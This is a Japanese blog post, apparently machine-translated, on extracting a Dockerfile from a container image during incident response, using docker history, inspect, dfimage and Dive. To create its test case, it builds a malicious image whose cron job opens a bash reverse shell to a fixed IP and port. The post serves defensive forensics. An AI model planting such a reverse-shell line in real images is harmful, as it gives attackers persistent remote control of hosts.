Dockerfileファイルを取得するためのDockerイメージ解析

Dockerfileファイルを取得するためのDockerイメージ解析

01. 概要

コンテナ イメージのセキュリティに関しては、特にイメージ ポイズニングによるセキュリティ インシデントが発生した場合、イメージのソースをトレースし、Dockerfile ファイルを解析することが、緊急インシデント処理の重要なステップとなります。このブログ記事では、コンテナのセキュリティにとって重要なイメージ解像度から Dockerfile を取得する方法について説明します。

02. 環境整備

Dockfile を使用して、リバウンド シェルの悪意のあるイメージを構築します。

 FROM ubuntu:20.04 RUN apt-get update &&\ apt-get install -y cron &&\ (echo '* * * * * bash -c "bash -i >& /dev/tcp/192.168.99.242/12345 0>&1"'; crontab -l )| crontab ENTRYPOINT ["cron","-f","&&"] CMD ["/bin/bash"]


03. イメージ解析Dockerfile

3.1 画像ファイル解析

イメージのメタデータ情報では、イメージの構築に使用された Dockerfile を正常に解析し、その Dockerfile の内容を取得して、イメージの構築プロセスと導入されたソフトウェア パッケージおよび構成を理解することができます。

 docker save -o test.tar test:v1.0 tar -xvf test.tar


3.2 Dockerコマンドパラメータ

指定したイメージの作成履歴を表示するには、docker history コマンドを使用します。情報の一部のみ表示可能です。すべての情報を表示するには、--no-trunc を追加できます。

 docker history test:v1.0 docker history test:v1.0 --no-trunc


docker inspect コマンドを使用して、Docker イメージの詳細情報を表示します。 --format パラメータを使用して出力情報を自分で定義し、イメージの構成情報を取得できます。

 #查看镜像的配置信息docker inspect --format='{{json .Config}}' test:v1.0

3.3 イメージ

dfimageは、イメージからDockerfileを抽出するために使用できるサードパーティのツールです。

(1)ショートカットを生成します。 dfimage を使用して、非常に詳細な Dockerfile を出力します。

 alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage" dfimage -sV=1.36 test:v1.0

3.4 Dockerイメージ解析ツールDive

Dive は、Docker コンテナイメージの内部を解析・閲覧し、各層のファイルの変更内容を詳細に確認できる Docker イメージ解析ツールです。

 alias dive="docker run -ti --rm -v /var/run/docker.sock:/var/run/docker.sock wagoodman/dive" dive test:v1.0

写真

<<:  クラウドの停止中に企業は損失を回復できますか?

>>:  Dockerfile は組み込みのシェル スクリプトをサポートし、&& リンク シンボルは不要になりました。

推薦する

Justhost: モスクワ データライン データセンターの無制限トラフィック VPS の簡単なレビュー

多くの人が justhost をよく知っているはずです。使用したことがある人は、基本的にその選び方を...

ウェブサイト間の競争における2つの方法の合理的な使用

今日では、ウェブサイトを運営するには競争がつきものです。小規模なウェブサイトには独自の競争相手がおり...

クラウド統合データセンターネットワークの利点は何ですか?

クラウドとインテリジェントの時代において、データ センター ネットワークは、クラウド サービスのシー...

K8Sエコシステムの選択と落とし穴をすべて網羅

[[320104]]収益の増加とコストの削減は、企業が利益を増やすための 2 つの主要な方向性です。...

QQグループのマーケティングプロモーションを効果的に実施する方法

楊万偉:QQグループのマーケティングプロモーションを効果的に行う方法QQグループでマーケティングやプ...

訪問者分析に基づくサイト広告レイアウトに関すること

最近では、多くのサイトが広告のクリック率を高めるためにあらゆる手段を講じています。たとえば、「クリッ...

Kubernetes ソフトウェア サプライ チェーンのセキュリティ保護

現代のソフトウェア開発手法では、ソフトウェア サプライ チェーンのセキュリティがこれまで以上に重要に...

ロングテールキーワードへの詳細なアプローチ

はじめに:ロングテールキーワードには、ユーザーニーズを解決するものとトラフィックを追求するものの 2...

Linux 仮想化 KVM-Qemu 分析 Vhost-Net

[[397740]]この記事はWeChatの公開アカウント「LoyenWang」から転載したもので、...

ixwebhosting 仮想ホスト プロモーション (Windows/Linux オプション)

皆さんご存知のとおり、彼らの仮想ホストは常に「H-ball」パネルを使用してきました。良いニュースを...

digitalocean-512Mメモリ/シンガポールVPSレビュー

Digitaloceanは設立されて2年以上、私も1年以上Digitaloceanを使っていますが、...

#大容量ハードドライブ VPS# vapornode-7 USD/KVM/1g RAM/500g ハードドライブ/2T トラフィック/フロリダ

Vapornode は年から運営されており(当サイトが初めて Vapornode のプロモーションを...

justhost: 2018年6月26日、モスクワデータセンターのVPSを再度確認したところ、中国電信CN2が再び登場しました

Justhost は一昨日、モスクワ データライン データセンターの VPS がネットワークの最適化...

123systems-2g メモリ/XEN/4 コア/50g ハードディスク/月間トラフィック 3T/年額 50 ドル

123systems が XEN ベースの VPS をリリースして以来、価格が少し高騰しています。も...

蔡文勝:良いお米はどんなに高くても価値があります!良い会社には良いドメイン名が必要です!

eName.cnは4月28日、Xiaomiが新しいドメイン名mi.comを立ち上げた際、雷軍氏は「非...